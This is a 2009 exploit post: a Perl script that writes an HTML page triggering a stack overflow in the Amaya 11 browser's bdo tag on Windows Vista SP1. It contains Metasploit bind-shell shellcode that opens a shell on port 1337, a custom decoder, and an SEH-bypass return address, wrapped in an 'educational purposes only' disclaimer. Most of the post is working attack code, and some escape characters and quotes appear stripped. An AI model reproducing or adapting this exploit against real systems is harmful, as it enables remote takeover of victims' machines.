amayavista-overflow.txt
Posted on 05 February 2009
#!/usr/bin/perl ############################################# # # Amaya 11 bdo tag stack overflow # # author: Rob Carter (cartrel@hotmail.com) # # targets: windows vista sp1 # # modified the alpha-numeric shell-code # from metasploit since the first 12 bytes # didn't fall within the ASCII range of # 0x01-0x7f. otherwise my payload would # have been corrupted on the stack. wrote # a 47-byte decoder to repair the shell- # code to its original state. # # this exploit bypasses safeSEH by jumping # to a pop pop push pop ret sequence in # one of the amaya modules that has a # constant base address in memory. ret's # back to the stack, short jump over the # overwritten SEH, decodes the first 12 # bytes of the shellcode and then runs # the repaired shellcode to bind a shell # on port 1337. # # $ perl amaya_sploit.pl > pwn.html # # the author is not responsible for any misuse of # this code. it is intended for educational # purposes only # ############################################# # win32_bind - EXITFUNC=seh LPORT=1337 Size=709 Encoder=PexAlphaNum http://metasploit.com my $shellcode = # original first 12 bytes of shellcode: # "xebx03x59xebx05xe8xf8xffxffxffx4fx49". "x7fx01x01x7fx03x68x78x70x6fx6fx3dx37". "x49x49x49x49". "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36". "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34". "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41". "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx36x4bx4e". "x4dx34x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x56x4bx48". "x4ex46x46x42x46x42x4bx58x45x44x4ex33x4bx38x4ex47". "x45x50x4ax47x41x50x4fx4ex4bx48x4fx34x4ax41x4bx38". "x4fx45x42x32x41x30x4bx4ex49x44x4bx48x46x53x4bx58". "x41x30x50x4ex41x43x42x4cx49x39x4ex4ax46x58x42x4c". "x46x57x47x50x41x4cx4cx4cx4dx50x41x50x44x4cx4bx4e". "x46x4fx4bx33x46x55x46x32x4ax52x45x37x45x4ex4bx48". "x4fx55x46x42x41x50x4bx4ex48x46x4bx38x4ex30x4bx54". "x4bx48x4fx35x4ex41x41x30x4bx4ex43x50x4ex32x4bx48". "x49x48x4ex36x46x52x4ex31x41x56x43x4cx41x53x4bx4d". "x46x56x4bx48x43x54x42x53x4bx58x42x44x4ex30x4bx48". "x42x37x4ex41x4dx4ax4bx48x42x54x4ax30x50x45x4ax56". "x50x38x50x54x50x50x4ex4ex42x55x4fx4fx48x4dx48x36". "x43x35x48x36x4ax46x43x43x44x43x4ax46x47x37x43x47". "x44x33x4fx55x46x35x4fx4fx42x4dx4ax36x4bx4cx4dx4e". "x4ex4fx4bx33x42x45x4fx4fx48x4dx4fx35x49x38x45x4e". "x48x46x41x58x4dx4ex4ax30x44x30x45x55x4cx36x44x50". "x4fx4fx42x4dx4ax46x49x4dx49x30x45x4fx4dx4ax47x35". "x4fx4fx48x4dx43x35x43x45x43x45x43x35x43x55x43x54". "x43x45x43x34x43x35x4fx4fx42x4dx48x46x4ax56x45x30". "x49x43x48x36x43x45x49x48x41x4ex45x59x4ax36x46x4a". "x4cx51x42x57x47x4cx47x35x4fx4fx48x4dx4cx56x42x41". "x41x45x45x55x4fx4fx42x4dx4ax36x46x4ax4dx4ax50x32". "x49x4ex47x55x4fx4fx48x4dx43x45x45x35x4fx4fx42x4d". "x4ax36x45x4ex49x44x48x48x49x44x47x55x4fx4fx48x4d". "x42x55x46x45x46x35x45x35x4fx4fx42x4dx43x39x4ax36". "x47x4ex49x37x48x4cx49x37x47x45x4fx4fx48x4dx45x55". "x4fx4fx42x4dx48x46x4cx36x46x46x48x56x4ax36x43x56". "x4dx56x49x38x45x4ex4cx56x42x55x49x35x49x52x4ex4c". "x49x48x47x4ex4cx56x46x34x49x58x44x4ex41x53x42x4c". "x43x4fx4cx4ax50x4fx44x54x4dx32x50x4fx44x34x4ex32". "x43x49x4dx48x4cx57x4ax43x4bx4ax4bx4ax4bx4ax4ax56". "x44x37x50x4fx43x4bx48x31x4fx4fx45x47x46x54x4fx4f". "x48x4dx4bx45x47x45x44x55x41x35x41x35x41x45x4cx56". "x41x50x41x45x41x55x45x55x41x45x4fx4fx42x4dx4ax56". "x4dx4ax49x4dx45x50x50x4cx43x45x4fx4fx48x4dx4cx56". "x4fx4fx4fx4fx47x53x4fx4fx42x4dx4bx38x47x45x4ex4f". "x43x38x46x4cx46x36x4fx4fx48x4dx44x55x4fx4fx42x4d". "x4ax46x42x4fx4cx48x46x50x4fx45x43x45x4fx4fx48x4d". "x4fx4fx42x4dx5a"; $decoder = "x5b". # pop ebx "x5b". # pop ebx "x68x6cx02x58x6c". # push 0x6c58026c "x58". # pop eax "x01x43x38". # add dword ptr[ebx+38],eax "x68x01x01x01x10". # push 0x10010101 "x58". # pop eax "x01x43x3c". # add dword ptr[ebx+3c],eax "x68x01x7fx7fx7f". # push 0x7f7f7f01 "x58". # pop eax "x01x43x3c". # add dword ptr[ebx+3c],eax "x68x11x11x01x01". # push 0x01011111 "x58". # pop eax "x01x43x40". # add dword ptr[ebx+40],eax "x68x7fx7fx11x11". # push 0x11117f7f "x58". # pop eax "x01x43x40"; # add dword ptr[ebx+40],eax $payload = "<bdo dir="". "A" x 6905 . "x74x06x41x41". "x51x55x03x10". # pop - pop - push - pop - ret 0c $decoder. "A". $shellcode. "">pwnd!</bdo>"; print $payload;
